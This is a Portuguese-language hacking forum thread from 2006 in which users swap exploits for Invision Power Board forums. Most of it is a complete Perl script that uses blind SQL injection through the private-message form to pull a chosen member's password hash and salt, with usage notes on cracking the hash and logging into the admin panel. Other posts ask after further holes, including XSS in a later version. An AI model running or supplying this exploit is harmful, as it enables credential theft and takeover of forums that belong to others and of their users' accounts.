Hackeando I.P.B 2.15

HadeS · 13 de June , 2006, 07:22:31 PM

Eu postei um exploit mais recente, e que foi desenvolvido para o IPB 2.1.5 mesmo (Esse é pro 2.1.4).

Link: http://www.darkers.com.br/smf/index.php ... 999.0.html

HadeS

Emilly Rose · 16 de June , 2006, 12:08:10 PM

Eu peguei um exploit que pega o hash e o salt

Se quiserem avise que eu posto

Froz3nnn · 16 de June , 2006, 02:46:47 PM

@Emily

Eu tambem estou com esse exploit, mas eu nao to conseguindo achar o passwords pro e nem usa-lo

Do resto é muito bom o exploit

Anonymous · 17 de June , 2006, 12:37:04 PM

Emilly Rose

Compartilhe esse exploit conosco

Abraços!

Emilly Rose · 17 de June , 2006, 11:09:20 PM

Aqui vai o exploit

#!/usr/bin/perl
#############################################################################
## IPB <=2.1.4 exploit (possibly 2.1.5 too)
## Brought to you by SHAK AND TEMUJIN.
## Originally by the Ykstortion security team.
##
## The exploit will retrieve the MD5 pass hash along with the case
## sensitive salt :)
##
## The bug is in the pm system so you must have a registered user.
## The exploit will extract a password hash from the forum's data base of
## the target user.
## You need to know the target user's member ID but it's not difficult to
## find out, just look under their avatar next to one of their posts.
## After you run the exploit, crack the hash with the salt
## and log into the ACP :)
##
## Usage:
## $ ./ipb
## IPB Forum URL ? forums.example.com/forums
## Your username ? krypt_sk1dd13
## Your pass ? if_your_on_nix_this_gets_hidden
## Target userid ? 3637
##
## Attempting to extract password hash from database...
## 537ab2d5b37ac3a3632f5d06e8e04368
## Attempting to extract password salt from database...
## _jnDE
## Hit enter to quit.
##
## Requirements:
## o Perl 5
## o LWP 5.64 or later
## o Internet access
## o A forum
## o A user on said forum
## o 32+ PMs left till your inbox is full, if not you can still delete
## PMs from your inbox as the successful ones come through
##
## Credit to: Nuticulus for finding the SQL injection
##
###########################################################################

use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;

# variables
my $login_page = '?act=Login&CODE=01';
my $pm_page = '?act=Msg&CODE=04';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $hash = '';
my $need_null = 0;
my $i;
my $j;

my @charset = ('0'..'9','a'..'f');

my %form = (act => 'Msg',
CODE => '04',
MODE => '01',
OID => '',
removeattachid => '',
msg_title => 'asdf',
bbmode => 'normal',
ffont => 0,
fsize => 0,
fcolor => 0,
LIST => ' LIST ',
helpbox => 'Insert Monotype Text (alt + p)',
tagcount => 0,
Post => 'jkl');

# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;

# init the cookie jar
$ua->cookie_jar ($cj);

# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";

# get user input
print 'IPB Forum URL ? ';
chomp (my $base_url = );
print 'Your username ? ';
chomp (my $user = );
$form{entered_name} = $user;
print 'Your pass ? ';
#system 'stty -echo'; # to turn off echoing
chomp (my $pass = );
#system 'stty echo'; # to turn it back on
print "\n";
print 'Target userid ? '; # it'll say next to one of their posts
chomp (my $tid = );

# parse the given base url
if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }

do {
$resp = $ua->post ($base_url . $login_page,
[ UserName => $user,
PassWord => $pass,
CookieDate => 1,
]);
} while ($tries-- && !$resp->is_success());

# reset tries
$tries = 5;

# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }

# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
die "Error: password incorrect.\n";
}

# get ourselves a post_key (and an auth_key too with newer versions)
do {
$resp = $ua->get ($base_url . $pm_page);
} while ($tries-- && !$resp->is_success());

# reset tries
$tries = 5;

if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }
if ($resp->content =~ m##)
{
$form{post_key} = $1;
} else {
die "Error: couldn't get a post key.\n";
}
if ($resp->content =~ m##)
{
$form{auth_key} = $1;
}

# turn off buffering so chars in the hash show up straight away
$| = 1;

print "\nAttempting to extract password hash from database...\n ";

OFFSET:
for ($i = 0; $i < 32; ++$i) {
CHAR:
for ($j = 0; $j < scalar(@charset); ++$j) {
# reset tries
$tries = 5;
print "\x08", $charset[$j];
# build sql injection
$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
. (join (',', map {ord} split ('', $user))) . ') FROM '
. 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('
. 'converge_pass_hash, ' . ($i + 1) . ', 1) = CHAR('
. ord ($charset[$j]) . ')';
$form{from_contact} = $sql;
$resp = $ua->post ($base_url . $post_pm_page, \%form,
referer => $base_url . $pm_page);
if (!$resp->is_success()) {
die "\nError: " . $resp->status_line
. "\n" if (!$tries);
--$tries;
redo;
}
if ($resp->content =~ /sql error/i) {
if ($need_null) {
die "Error: SQL error.\n";
} else {
$need_null = 1;
redo OFFSET;
}
} elsif ($resp->content !~ /there is no such member/i) {
# we have a winner !
print ' ';
next OFFSET;
}
}
# uh oh, something went wrong
print "\nError: couldn't get a char for offset $i\n";
}

@charset = ();
for($j = 33; $j <= 126; $j++)
{
push(@charset, chr($j));
}

print "\nAttempting to extract password salt from database...\n ";

OFFSET:
for ($i = 0; $i < 5; ++$i) {
CHAR:
for ($j = 0; $j < scalar(@charset); ++$j) {
# reset tries
$tries = 5;
print "\x08", $charset[$j];
# build sql injection
$sql = '-1 UNION SELECT ' . ($need_null ? '0, ' : '') . 'CHAR('
. (join (',', map {ord} split ('', $user))) . ') FROM '
. 'ibf_members_converge WHERE converge_id = ' . $tid . ' AND MID('
. 'converge_pass_salt, ' . ($i + 1) . ', 1) = BINARY CHAR('
. ord ($charset[$j]) . ')';
$form{from_contact} = $sql;
$resp = $ua->post ($base_url . $post_pm_page, \%form,
referer => $base_url . $pm_page);
if (!$resp->is_success()) {
die "\nError: " . $resp->status_line
. "\n" if (!$tries);
--$tries;
redo;
}
if ($resp->content =~ /sql error/i) {
if ($need_null) {
die "Error: SQL error.\n";
} else {
$need_null = 1;
redo OFFSET;
}
} elsif ($resp->content !~ /there is no such member/i) {
# we have a winner !
print ' ';
next OFFSET;
}
}
# uh oh, something went wrong
die "\nError: couldn't get a char for offset $i\n";
}

print "\x08 \x08\nHit enter to quit.\n";
;

Anonymous · 25 de June , 2006, 04:12:41 PM

pra mim apareceu esta mesangem

Attempting to extract password hash from database...
00000000000000000000000000000000
só zeros e nada de letras nem numeros variados

HadeS · 25 de June , 2006, 06:52:23 PM

O fórum não está vulnerável.

HadeS

Emilly Rose · 26 de June , 2006, 05:41:42 PM

Se nem leu o topico né?! rsrs
Como o HadeS ja disse o fórum não está vul.

Anonymous · 08 de July , 2006, 03:10:12 PM

e o IPB 2.1.6

? alguem já sabe algo?

HadeS · 08 de July , 2006, 05:41:30 PM

Me parece que existe XSS. Mas nunca testei.

Dá uma pesquisada por aí, talvez ache.

HadeS

Anonymous · 08 de July , 2006, 08:18:44 PM

sim eu cheguei a ver esse Xss num site russo !! mais como usar

Emilly Rose · 10 de July , 2006, 01:13:43 PM

Ai teremos que procurar.. =D

Hackeando I.P.B 2.15

Anonymous

Anonymous

Anonymous

Anonymous